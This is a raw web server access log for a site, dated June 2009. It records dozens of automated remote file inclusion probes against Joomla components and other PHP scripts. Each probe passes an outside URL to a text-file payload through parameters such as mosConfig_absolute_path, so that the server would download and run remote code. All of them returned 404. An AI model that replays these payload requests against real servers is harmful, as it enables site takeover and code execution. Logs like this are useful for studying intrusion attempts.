218.146.231.193 - - [13/Jun/2009:08:04:54 -0700] "GET /logs/http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
218.146.231.193 - - [13/Jun/2009:08:04:54 -0700] "GET /http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:05 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:05 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:32 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:08:13:32 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:17 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:17 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:17 -0700] "GET /logs/access_071012.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:46 -0700] "GET /logs/access_071112.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:46 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:15:46 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:20:24 -0700] "GET /logs/access_071012.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:08:20:37 -0700] "GET /logs/access_071112.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
98.116.62.213 - - [13/Jun/2009:08:24:41 -0700] "GET /logs//atom.php5?page=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
98.116.62.213 - - [13/Jun/2009:08:24:41 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:32:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:32:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:32:09 -0700] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:32:25 -0700] "GET /logs/access_071212.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:36:51 -0700] "GET /logs/access_070812.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.16.54 - - [13/Jun/2009:08:37:25 -0700] "GET /logs/access_071212.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eduloco.kit.net/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:39:49 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:39:50 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:39:50 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:40:42 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:47:20 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:47:20 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:47:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.240.235.130 - - [13/Jun/2009:08:48:02 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:08:50:10 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:08:50:10 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:08:50:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:08:50:24 -0700] "GET /logs/access_071212.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
98.173.26.143 - - [13/Jun/2009:08:53:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "envolk/1.7 (+http://www.envolk.com/envolkspiderinfo.html)" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:48 -0700] "GET /logs/access_071212.log%20%20/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:48 -0700] "GET /index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:48 -0700] "GET /logs/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:58 -0700] "GET /index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:58 -0700] "GET /logs/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:28:59 -0700] "GET /logs/access_071212.log%20%20/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.176.226.164 - - [13/Jun/2009:09:32:22 -0700] "GET /logs/access_071212.log/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.176.226.164 - - [13/Jun/2009:09:32:22 -0700] "GET /index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.176.226.164 - - [13/Jun/2009:09:32:22 -0700] "GET /logs/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:35:13 -0700] "GET /logs/access_071212.log/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.225.228.90 - - [13/Jun/2009:09:35:17 -0700] "GET /logs/access_071212.log/index.php?pagina=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:39:43 -0700] "GET /BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:39:44 -0700] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:39:44 -0700] "GET /logs/access_070812.log%20%20//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:39:48 -0700] "GET /logs/access_070912.log%20%20//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:44:48 -0700] "GET /logs/access_070812.log//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [13/Jun/2009:09:44:55 -0700] "GET /logs/access_070912.log//BaseAdmin.class.php?_CONF[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:09:49:09 -0700] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:09:49:09 -0700] "GET /BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:09:49:12 -0700] "GET /logs/access_070812.log%20%20//BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:09:49:38 -0700] "GET /logs/access_070912.log%20%20//BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.146.231.193 - - [13/Jun/2009:09:55:51 -0700] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
218.146.231.193 - - [13/Jun/2009:09:55:52 -0700] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:10:03:10 -0700] "GET /logs/access_070812.log//BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.239.227.229 - - [13/Jun/2009:10:03:11 -0700] "GET /logs/access_070912.log//BaseAdmin.class.php?_CONF[path]=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:05:27 -0700] "GET /logs/access_071012.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:05:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:05:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:06:02 -0700] "GET /logs/access_070912.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:13:44 -0700] "GET /logs/access_070812.log//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:13:44 -0700] "GET /logs//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:13:44 -0700] "GET /image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:13:48 -0700] "GET /logs/access_071112.log//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:16:09 -0700] "GET /logs/access_071012.log//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:16:15 -0700] "GET /logs/access_070812.log%20%20//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.47.236.215 - - [13/Jun/2009:10:16:15 -0700] "GET /logs/access_071012.log%20%20//image_upload.php?sbp=http://63.247.71.7/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:10:35:12 -0700] "GET /skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.203.180.144 - - [13/Jun/2009:10:35:12 -0700] "GET /skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.6.22.163 - - [13/Jun/2009:10:46:43 -0700] "GET /clipart/pageHeaders/ HTTP/1.0" 200 691 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:59:00 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:59:00 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:10:59:00 -0700] "GET /logs/access_071012.log%20%20//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
117.74.99.225 - - [13/Jun/2009:11:00:48 -0700] "GET /logs/access_071012.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:03:20 -0700] "GET /logs//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:03:20 -0700] "GET /include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:03:20 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:03:44 -0700] "GET /include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.143.98.5 - - [13/Jun/2009:11:03:58 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.143.98.5 - - [13/Jun/2009:11:03:59 -0700] "GET /include/mail.inc.php?skin_board_path=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:04:59 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:00 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:05:16 -0700] "GET /logs//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:05:16 -0700] "GET /logs/access_071012.log%20%20//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:05:16 -0700] "GET /include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:19 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:34 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:34 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:34 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:05:53 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.143.98.5 - - [13/Jun/2009:11:06:18 -0700] "GET /logs/scripts.log%20%20//include/mail.inc.php?skin_board_path=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:06:23 -0700] "GET /logs//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:06:23 -0700] "GET /include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:06:23 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:06:59 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:10:09 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:10:09 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:10:09 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:10:28 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:12:38 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
